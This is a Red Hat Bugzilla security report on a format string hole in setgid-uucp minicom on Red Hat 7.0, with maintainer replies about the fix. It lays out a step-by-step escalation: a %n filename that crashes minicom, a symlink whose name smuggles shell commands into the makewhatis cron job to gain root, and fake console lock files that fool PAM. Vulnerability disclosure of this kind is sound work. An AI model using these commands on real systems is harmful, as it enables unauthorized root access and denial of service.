Bug 35613 - SGID uucp from minicom = format string + setgid uucp + makewhatis.cron bug
SGID uucp from minicom = format string + setgid uucp + makewhatis.cron bug
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: minicom (Show other bugs)
7.0
i386 Linux
high Severity medium
: ---
: ---
Assigned To: Mike A. Harris
David Lawrence
: Security
: 39033 (view as bug list)
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2001-04-11 08:04 EDT by Need Real Name
Modified: 2007-03-26 23:43 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-05-03 18:14:10 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Need Real Name 2001-04-11 08:04:14 EDT
[ Pre-release version of advisory for minicom ]
[ If you have gained access to this version   ]
[ and are not someone who is responsible for  ]
[ fixing it, or ensuring that it gets fixed,  ]
[ stop reading NOW!                           ]

[ If you might be someone mentioned above,    ]
[ but aren't sure if you are, then try do     ]
[ something towards getting it fixed. If you  ]
[ definately aren't one of the aforementioned ]
[ persons, then WTF are you still reading     ]
[ this for?                                   ]

############################################
  minicom - format string holes since 1997. 

         minicom  ROOT  exploit.

############################################
               zen-parse
############################################
############################################
                SYNOPSIS
############################################

Minicom has a format string bug in its
logging function.
Any user who has access to a setgid uucp 
minicom can potentially gain root access
within 24 hrs, or have console access 
(as determined by PAM) and be able to
cause shutdown of the machine immediately.

affects: Redhat 7.0, almost definately 
         earlier based on dates in sourcecode 
         comments.

         May not be a security hole on other
         distributions. Depends on if its
         setuid/setgid.

         Root exploit does exist. 
         (I wrote one last night)


############################################
                  details
############################################
[root@clarity src]# whatis minicom
minicom              (1)  - friendly serial communication program
[root@clarity /root]# rpm -qf `which minicom`
minicom-1.83.1-4
[root@clarity src]# ll `which minicom`
-rwxr-sr-x    1 root     uucp       171452 Jan 30 05:54 /usr/bin/minicom*
[root@clarity src]# cd /usr/src/redhat/SOURCES/minicom-1.83.1/src
[root@clarity src]# grep do_log common.c|grep -v "%" 
common.c: *             void do_log(char *)     - write a line to the
logfile
common.c: * 27.10.98 jl  converted do_log to use stdarg
common.c:void do_log(char *line, ...)
common.c:void do_log(char *line, ...)
[root@clarity src]# grep do_log updown.c 
    do_log(cmdline);   /* jl 22.06.97 */
                        do_log (trimbuf);
                      do_log(trimbuf);
    do_log (trimbuf);

 
<should be:

    do_log("%s",cmdline);   /* jl 22.06.97 */
                        do_log ("%s",trimbuf);
                      do_log("%s",trimbuf);
    do_log ("%s",trimbuf);

 and others are spread through the code that I haven't checked, but
 should probably be fixed.>

<updown.c contains the code for the uploading and downloading of files.
 cmdline contains the command that it executes to upload and download
 files. Part of the command is of course the filename.>

[root@clarity src]# touch ~/%n
[root@clarity src]# ll ~/%n
-rw-r--r--    1 root     root            0 Apr 11 11:26 /root/%n

<Using root to demonstrate problem so i can gdb the sgid program.>

[root@clarity src]# gdb minicom 
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) r
Starting program: /usr/bin/minicom 
minicom: WARNING: please don't run minicom as root when not maintaining
                  it (with the -s switch) since all changes to the
                  configuration will be GLOBAL !.


<Screen clears... initializing modem message...>

Welcome to minicom 1.83.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n 
Compiled on Aug 24 2000, 10:09:47.

Press CTRL-A Z for help on special keys
                                                     
                                                     
<press ^A S ,select xmodem, then move the cursor down to %n, press 
 space to tag it and then press return...>

(no debugging symbols
found)...                                                
Program received signal SIGSEGV, Segmentation
fault.                           
0x400b7a17 in _IO_vfprintf
(s=0x8080a60,                                       
    format=0xbffff2c0 "/usr/bin/sx -vv %n",
ap=0xbffff248)                     
    at
../sysdeps/i386/i486/bits/string.h:539                                  
539     ../sysdeps/i386/i486/bits/string.h: No such file or
directory.         
(gdb) q

<Ok, big deal. You get gid uucp if you exploit it.>

[root@clarity src]# cd /var/lock
[root@clarity lock]# ls -Flatrck
total 20
drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ../
drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys/
drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console/
drwxrwxr-x    4 root     uucp         4096 Apr 11 11:31 ./

<writable by gid uucp.. ok>
[root@clarity lock]# cat /etc/cron.daily/makewhatis.cron 
#!/bin/bash

LOCKFILE=/var/lock/makewhatis.lock

# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes.  The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "rm -f $LOCKFILE" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0

< The worst that can happen is someone will exploit this lockfile
  mechanism for root. >

[root@clarity lock]# su uucp
<or run an exploit against minicom.. the gid is the important part.>
sh-2.04$ id
uid=10(uucp) gid=14(uucp) groups=14(uucp)
sh-2.04$ ln -s "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd
tmp;export PATH=.;getroot;echo .1.gz" /var/lock/makewhatis.lock
sh-2.04$ ls -al
total 16
drwxrwxr-x    4 root     uucp         4096 Apr 11 11:41 .
drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ..
drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console
lrwxrwxrwx    1 uucp     uucp           91 Apr 11 11:41 makewhatis.lock ->
/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export
PATH=.;getroot;echo .1.gz
drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys
<ok... what is happening? checkout /usr/sbin/makewhatis. 
                pipe_cmd = "zcat " filename;
if the filename contains shell commands, they will be exectuted. not
normally a problem, as what manpages have embedded shell commands?
malicious ones, like this. The echo on the end is to prevent it from 
returning an error from the command. the export PATH=. is because we
can't put any / characters in the filename. well that will get you root
next
time /etc/cron.daily/makewhatos.cron runs. what else ...>
sh-2.04$ rm makewhatis.lock 
sh-2.04$ echo -n uucp>console.lock 
sh-2.04$ mv console oldconsole
sh-2.04$ mkdir console;touch console/uucp 
<now we are at the console(according to PAM anyway). halt anyone?>


************************************************************************
              zen-parse - unemployed computer person. 

                    <CV available on demand - 
                 Could whoever it was who emailed 
              me about that please email again? Thats
            not to say any companies who haven't emailed
                  me can't email me this time...>
************************************************************************
Comment 1 Jarno Huuskonen 2001-04-11 17:48:38 EDT
With older minicoms it's possible to do:
minicom -C filename to create a file with uucp group
(Red Hat 7.0 seems to have a patch for this ?)

Why not use /var/lock/uucp for uucp locks instead of /var/lock (no need
for group uucp writable /var/lock ?)
Comment 2 Mike A. Harris 2001-04-12 13:33:35 EDT
Thanks very much for the report.  I'm on it.
Comment 3 Mike A. Harris 2001-05-03 18:11:08 EDT
*** Bug 39033 has been marked as a duplicate of this bug. ***
Comment 4 Mike A. Harris 2001-05-03 18:14:05 EDT
By the way, this exploit is not "root by minicom" it is SGID UUCP by minicom.
The makewhatis thing has been fixed for a while, and that would be a total
different exploit "root from makewhatis".

Solution is in the works.
Comment 5 Mike A. Harris 2001-05-03 22:44:03 EDT
Fixed in 1.83.1-8 for 7.x releases.  1.83.1-1.0.[56]x for older releases.
Errata release pending.
Comment 6 Need Real Name 2001-05-13 13:54:23 EDT
makewhatis thing fixed?
Well, rh 7.0, updated with up2date is still vulnerable.

Is there like a secret update thing that I didn't hear about that is protecting
everyone?

Note You need to log in before you can comment on or make changes to this bug.